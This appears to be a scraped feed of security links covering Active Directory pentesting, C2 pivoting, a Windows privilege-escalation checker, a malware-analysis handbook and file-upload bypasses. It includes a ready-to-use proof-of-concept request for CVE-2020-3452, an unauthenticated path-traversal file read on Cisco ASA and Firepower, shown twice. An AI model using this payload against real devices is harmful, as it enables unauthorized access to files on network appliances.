Top 16 Active Directory Vulnerabilities - InfosecMatter
https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/
https://www.infosecmatter.com/top-16-active-directory-vulnerabilities/
InfosecMatter
Top 16 Active Directory Vulnerabilities - InfosecMatter
Practical steps on how to pentest Active Directory environments using a list of most common AD vulnerabilities. Tools and command examples for testing and exploitation of AD vulnerabilities.
AD Attack
1) Performing domain recon using PS
https://t.co/Pt6VpJqGdO
2) Attack mapping with bloodhound
https://t.co/CpmB4XW3pq
3) Extracting passwd hashes
https://t.co/f55XUSyx1k
4) Pass-the-hash attacks with mimikatz
https://t.co/PPkBjPpVgK
1) Performing domain recon using PS
https://t.co/Pt6VpJqGdO
2) Attack mapping with bloodhound
https://t.co/CpmB4XW3pq
3) Extracting passwd hashes
https://t.co/f55XUSyx1k
4) Pass-the-hash attacks with mimikatz
https://t.co/PPkBjPpVgK
Stealthbits Technologies
Performing Domain Reconnaissance Using PowerShell
In this post, we will cover a few of the different ways that PowerShell can be used by attackers to map out your environment and chose their targets.
HTTP(s) C2 Pivoting. Introduction | by Steve Borosh | Jul, 2020 | Medium
https://medium.com/@rvrsh3ll/offensive-internal-http-s-agent-pivoting-2e9b4b7e58d8
https://medium.com/@rvrsh3ll/offensive-internal-http-s-agent-pivoting-2e9b4b7e58d8
Medium
Offensive Internal HTTP(s) Agent Pivoting
Introduction
GitHub - Q4n/CVE-2020-1362: writeup of CVE-2020-1362
https://github.com/Q4n/CVE-2020-1362
https://github.com/Q4n/CVE-2020-1362
GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.
https://github.com/hlldz/dazzleUP
https://github.com/hlldz/dazzleUP
GitHub
GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates…
A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. - hlldz/dazzleUP
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read "/+CSCOE+/portal_inc.lua" file.
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
Happy Hacking!
For example to read "/+CSCOE+/portal_inc.lua" file.
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
Happy Hacking!
NATO releases Malware Analysis primer
https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/
https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/
Malware_Reverse_Engineering_Handbook.pdf
4.8 MB
Malware_Reverse_Engineering_Handbook.pdf
Flipper Zero — Tamagochi for Hackers by Flipper Devices Inc. — Kickstarter
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers
Kickstarter
Flipper Zero — Multitool for Hackers
Open source multi-tool device for researching and pentesting radio protocols, access control systems, hardware, and more.
“Exploiting File Upload using Null byte” by Gupta Bless https://link.medium.com/VfjDpqmfD8
Medium
Exploiting File Upload using Null byte
In my previous blog related to FILE upload, I already discussed some basic techniques to bypass whitelisting of file extensions. Now in…